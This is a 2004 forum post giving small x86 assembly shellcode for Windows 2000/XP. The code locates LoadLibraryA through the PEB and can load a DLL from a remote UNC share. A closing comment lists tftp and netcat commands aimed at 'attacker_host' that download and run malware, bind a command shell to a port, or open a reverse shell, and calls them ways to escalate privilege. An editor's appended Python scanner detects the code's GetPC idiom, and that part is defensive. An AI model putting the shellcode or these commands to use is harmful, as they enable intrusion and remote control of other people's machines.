Tiny ShellCode for Win2K/XP

  • 30-04-2004 6:22pm
    #1


    %title "xdll.asm"
    comment £
    
    	NOTE: This was intended for release in an e-zine next year.
    	It's a little bit of work I did some months ago. I have a lot
    	more code similar to this, of course, but this was the smallest of the lot.
    	You may find it interesting. :)
    	If you want to see the other code, send me a private message
    	and I'll get back to you asap.
    	;===========================================================
    
    	January 2004
    
    	This is memory independent x86 assembly code for any Win2K/XP OS.
    	It executes LoadLibraryA specifying user32 as argument.
    	However, this is just an example of what is possible.
    	The main thing to observe is the UNC hint.
    	
    	Elaborating a little..
    	Entrypoint procedures of DLL files are executed when loaded into memory.
    	So the DLL code need not be in assembly, nor memory independent.
    	You may use any HLL-coded DLL, whether in C/C++/Java, etc.
    	
    	Size of this code is currently 86 bytes.
    	It doesn't do anything useful at the moment, but
    	one *could* have a stable reverse shell, using the loader, under 100 bytes.
    	
    	tasm32 /ml /m9 xdll.asm
    	tlink32 /Tpe /aa /x xdll.obj,,,import32.lib
    £
    .586
    .model flat, stdcall
    extrn	ExitProcess	:proc
    .code
    	ret
    .data		; code is in the data section, where everything is writeable (tasm allows this)
    main:
    	mov	eax, exit_point-entry_point		; currently 86 bytes
    entry_point:
    	push	090c3565eh	; "pop esi/push esi/ret/nop" -> same as "call $+5" to get delta
    	mov	eax, esp				; without null bytes
    	call	eax
    	lodsd						; skip 8 bytes of code
    	lodsd
    	push	esi						; LoadLibraryA argument
    	inc	byte ptr [esi + nUNCLen - 1]		; complete null terminated string
    	jmp	$+nUNCLen+2
    	;=====================
    szUNC:
    	;db	"\\HOST\SHARE\DLL",0ffh
    	db	"user32",0ffh
    nUNCLen	equ	$-szUNC
    	;=====================
    	push	30h
    	pop	ecx
    	mov	eax, fs:[ecx]			; Getting PEB Infos - Ratter/29A Issue 6
    	mov	eax, [eax + 0ch]
    	mov	esi, [eax + 1ch]
    	lodsd
    	mov	ebx, [eax + 08h]
    	;=====================
    	mov	cl, 03h
    	mov	eax, [ebx + 3ch]			; size of optional PE header (word ;)
    	mov	eax, [ebx + eax + 78h]		; export directory
    	lea	esi, [ebx + eax + 1ch]		; offset API rva
    load_rva:
    	lodsd
    	add	eax, ebx
    	push	eax
    	loop	load_rva
    	pop	edx
    	pop	esi
    	mov	eax, 'daoL'				; 'Load' .. not reliable perhaps?
    load_index:
    	mov	edi, [esi + ecx * 4]
    	add	edi, ebx
    	inc	ecx
    	scasd						; scan first 4 bytes of API string
    	jne	load_index
    	dec	ecx
    	pop	esi
    	movzx	eax, word ptr [edx + ecx * 2]		; get API ordinal
    	add	ebx, [esi + eax * 4]			; add api address rva to base
    	call	ebx						; call api
    	;==================================
    exit_point:
    	push	eax
    	call	ExitProcess		; only here for test & because win2k/xp crash with no imports
    
    comment £
    
    	Knowing that WinExec can be located with the same procedure as LoadLibraryA,
    	the following ways can be used to escalate privilege on the system.
    
    cmd /c tftp -i attacker_host GET malware.exe && malware.exe			; download & execute file
    cmd /c tftp -i attacker_host GET nc.exe nc.exe && nc -Lp2004 -ecmd		; bind cmd to port 2004
    cmd /c tftp -i attacker_host GET nc.exe nc.exe && nc attacker_host 2004 -ecmd	; reverse-callback cmd port 2004
    	
    	This all but eliminates the need for complex shellcode, temporarily, by simply executing commands.
    £
    end	main
    
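A detection-side example added here by the editor; it is not part of the original post. It scans a byte buffer for the delta-fetch idiom at the top of the code (push a "pop esi/push esi/ret" stub, mov eax,esp, call eax), which a file or memory scanner can flag because the pushed immediate has to decode as valid stack code. The sample buffer is constructed, and the 89 E0 encoding of mov eax,esp is an assumed alternative to TASM's 8B C4.

```python
import re
import struct

# Machine-code encodings of the three-instruction delta-fetch idiom
# (push stub / mov eax,esp / call eax) used at the top of xdll.asm:
#   push imm32     68 xx xx xx xx   (imm32 is the stub that runs on the stack)
#   mov eax, esp   8B C4 (TASM)  or  89 E0 (assumed alternative encoding)
#   call eax       FF D0
GETPC_RE = re.compile(rb"\x68(.{4})(?:\x8b\xc4|\x89\xe0)\xff\xd0", re.DOTALL)


def decodes_as_stack_stub(imm: bytes) -> bool:
    """True if the pushed dword, read as x86 code, is 'pop r32 / push r32 / ret'
    (pop r32 = 58+reg, push r32 = 50+reg, ret = C3); the 4th byte is filler."""
    pop, push, ret = imm[0], imm[1], imm[2]
    return 0x58 <= pop <= 0x5F and push == pop - 8 and ret == 0xC3


def find_getpc_stubs(buf: bytes) -> list:
    """Scan a byte buffer (file section, memory dump) for the idiom and return
    (offset, pushed_dword, register_number) for each hit; register_number is
    the r32 index (6 == esi) that ends up holding the delta."""
    hits = []
    for m in GETPC_RE.finditer(buf):
        imm = m.group(1)
        if decodes_as_stack_stub(imm):
            hits.append((m.start(), struct.unpack("<I", imm)[0], imm[0] - 0x58))
    return hits


# Constructed sample: 5 bytes of NOP padding, then the bytes TASM emits for
# "push 090c3565eh / mov eax,esp / call eax / lodsd", then zero padding.
SAMPLE = (b"\x90" * 5
          + b"\x68\x5e\x56\xc3\x90" + b"\x8b\xc4" + b"\xff\xd0" + b"\xad"
          + b"\x00" * 4)

if __name__ == "__main__":
    for off, dword, reg in find_getpc_stubs(SAMPLE):
        print(f"GetPC stack stub at offset {off}: push 0x{dword:08x}, delta -> r{reg}")
```

A push of an arbitrary immediate followed by the same two instructions is not reported, so ordinary compiler output that happens to call through eax does not trigger the rule.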